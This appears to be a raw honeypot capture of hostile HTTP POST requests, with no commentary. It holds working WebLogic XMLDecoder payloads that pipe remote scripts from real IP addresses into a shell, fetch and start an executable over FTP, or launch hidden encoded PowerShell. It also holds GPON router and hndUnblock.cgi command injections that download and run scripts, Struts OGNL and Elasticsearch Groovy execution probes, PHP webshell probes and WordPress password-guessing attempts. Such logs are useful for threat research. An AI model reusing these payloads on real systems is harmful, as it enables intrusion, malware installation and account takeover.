Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
bˇg–Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îR
/Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 846
Host: x.x.x.x:7001



POST http://hyipgame.ru/socks/engine.php HTTP/1.0
Accept: */*
Referer: http://hyipgame.ru/socks/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: hyipgame.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache

xrumer=inside

POST http://check.proxyradar.com/azenv.php?auth=145914623153&a=PSCMN&i=1760126605&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=161616

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

RKQMyY6aZrInHS4hhGR5w0VoSx70XoXCNOdJ3Y4mWAA7DgTlOARBt5BtL9VRctyTdRjGATWRyGM/B+yy0wQ5zAaPCOUkdsuPP7vRFKBuf3I4ozSvub15448wZALdKnmMDYn9hhEFvXqVZyEiHw9fxVWFW/sWscaVLa12PSo4o/f0SnSJz1iTFLXGmzyWUhKXCBYPgYdkmwDJVBvUI79ZwBWwzF1Vgy3Ivwkp16FseVpyGdpP44bLaUsvJ+tJ5jZTt/T2tNIonmtnn+66kz5RnYKrv6T6Q6Od/6sVeuEc79UEtCTS+qgbfhnxqoG8F6khBOeJRfWrMolpTbYwTXPKFJ4uBt2KPCddHXdKI9g3v0LmalH92d8EvF6+N913fE78rA==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

F6cMxNnMY8uJPuO1PmTId6I0UeBDeqxUbroSjCP0+2J1xu9WMHpjpOWjM4FTR3YwpKznxbywQ9rWTvpUGd3afK3jOk7wPd2wc8ORieC3kJX+BBE15KrdJKyYClKGhJESKuNfGfMchOcCzeYB57CmgMt6Tnr7pfKBRNd+Aa6+ujBu+6s3JaT2sHngwz4yfOI9mGs1HTIPk2rfnfJzlI0QnPprRd9BwkxK8ErvAtyvfFN3FAaTJ6TsEQ4eIvc6483w3mxhLRdHdGuIz7l8YKQs/50YbzPo2ZcE4S54b658s7EiMffhkAXCCPPu2tJtoUnF0ar/Py8ys6i1StCIJiEIxwc1HKr2m2CWHMZKpPf+NJkCN0wedII4QSXzPxkaZYq5/tG4h/U=

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

437136
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

458475fb51efee33bdbefa530b5890c9
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--eYnlN31sG7dOa3GMgPj-nELsN4sRoJQImpM6rM--


POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

E/QMxo/LNwb085dKJ9kB+xsyiRCN+YuRBRIkZmlyFRG8Q3oxTb3cd4rws4zu2idl708wrIUSINSnRP0dISuER3LcjdPhWEKdjA+dDquA26nsI0Gv1MPgsUEgfSBcrwBLKyDzrbH0aUh+0FkkPtPmgDmvo7kogjTF8bOWjEwZH6cWHPPeN6uwdvcSKXGjvH7sIta+v91yLTSW9ExHR0P7ZzbN364uom/CZg5ZK4cZ1dwwugeG0roTfD4Z98QgKVg3GgDclkteC4bkPFGVEnlElD9krZtpTRgQSrukElOidnKhPS1LG3NXniEM9tICbz7mKRvBxdHNqCnFpAo9wNxV5c+RBaicEg0r3mamFfRDGb4u

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=12345678

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

Rq0PwY6ZZ/uSJUkakVGtD1phw5+idZ1D8bjxBavefbikVttxo4r0cQMvhc1svK3JlgLRLUgJGMuUKXpzzdd3zkhRtnCRfYq0aefjh6FLb72eZFs1uXVSS/e7iLUZRDXwelcQGkRIKCwQuKysHbC/4VYpRl1vSHy7nmrAntXzkdN74kXi1rxQtb7IK/5r8SGLM1ye7J2wlTpS5xMXdOvlIBAOAp9ld656DdRVYwKGAy7yWqimhWqLnksndDtgsuLlnVr8C2qru/1hfl5bSuLu+p4wnP6s/UYhuoeaDmGbqC0h1oTuXh4Fnl0jnVL4kWNUHxn8fDSQCE62Gh3noJiMCAUoq86AkXshe3zr/QrJBm5uO+ObYgSq/7yiAyGCXhC4ZE3bFqwpdzbR1Kb9jE3wLko+g5qhkugF1/zNibUq5cJJVuTmZH6i

POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=172&pwd=1722222

POST /login.action HTTP/1.1
Host:64.137.190.224:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 425
Content-Type: application/x-www-form-urlencoded

(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&web=security_&path=check

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /hndUnblock.cgi HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=asd!@#

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
⁄‰¸,Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

QvZdlI7KMW6/WIk+9qH+H56nocEMNqmiL3biNcnCLTcE8mvU4LNtQP5isGNhCjHm422ugkQzJj8RgMayMvdVVXiW6ZnZJ7cspjPfAHLjt3Ok9lIAi4W2q/QiQQGRh9iyA62KmR/O27zPrDbH4RaA0OC6rDvoxCG3+V5wp59tRwWOBOS7nLGp8mFs+1XVb1PRXx/PgXdQgyyQqLttcnv6rs57AFtekpN2rMkAGkMvkXnUi6sOhOKDObMbDmdKaf/Js0jm4A6Jzu3AmOeQwKxuZCTVnF8NKVDEz8m0dgOEA6Z+eGIiPCyEjk4XZ9OwAh3WdmIQMiwEXxbZrSoxsx1yqpzLr9hovAz+mt5SPWXvSwpcrTzS1Lh33YEzvWE=

POST http://t1.proxy-checks.com/favicon.ico  HTTP/1.1
Host: t1.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

Rqxdxd+abaj0zWwxvLfaAJkH3i3KWBgpbV34BHbzTEX9RWtHO+ypW8kNvKDmO1vF3JWhxy3vfGit0ZXMAV11TNJTYX4trlP9wNvkhik3ALeMoONHwFT9xdBKfsy6n2IFyCkfqI0v06CRMHzwuuekTZD2GAAx0EDXj1YuUHNe87mLP4smoHP1c7Be2pJVWzGjqorFo9mJJPiSNSZ+SqJIyctyah8ebQ/eg1CvSs8DrQn0R+M5ICs0H+L2nHcaQPNWV3ujVe9KQHmWeoQbFvOoDMDEG/bRJQ4NK4lF2fh1NH2U7oN+jcow1hpCaJax1sAjMLmaULJQi9EAsppXFIhPl+GPZiOtqNBSla8jRTLACXYP/iRvHJR7wMr1AkgOuDeZrJTlsjkv7A2JUl6oK1n+yh9XcmFoHu0Me+Q1HW5yISmiaw==

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache

xrumer=inside

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache

log=jamesatchue&pwd=0jamesatchue

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

952354
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

d27655b22d572c038d9f270482e322b3
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV--


POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=5555555

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 577
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8" class="java.beans.XMLDecoder">
    <void id="url" class="java.net.URL">
      <string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F64.137.220.18%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
    </void>
    <void idref="url">
      <void id="stream" method = "openStream" />
    </void>
  </java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

